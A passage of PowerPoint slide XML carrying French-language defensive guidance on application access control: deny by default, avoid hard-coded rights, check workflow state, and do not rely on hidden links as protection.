              <a:t>autorisations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>consistant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>facilement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>analysable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>appelé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>depuis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fonctionnalités</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> métier. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> type de protection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fréquemment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fourni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>composants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>externes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Faites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sorte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gestion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>droits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>soit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> facile à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mettre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à jour et à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auditer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>codez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pas en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gestion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>droits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>défaut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interdire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tout </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accès</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ceci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> impose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’autorisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>explicite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>certains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rôles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chacune</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fonctionnalités</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proposées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Si la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fonctionnalité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fait </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>partie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> d’un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>workflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vérifiez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les conditions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accéder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>état</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>réunies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOTE : La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>plupart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des applications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n’affichent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pas de liens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fonctionnalités</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>restreintes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mais</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>constitue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> protection. Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vérifications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doivent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aussi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>être</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>réalisées</a:t>
            </a:r>
            <a:r>
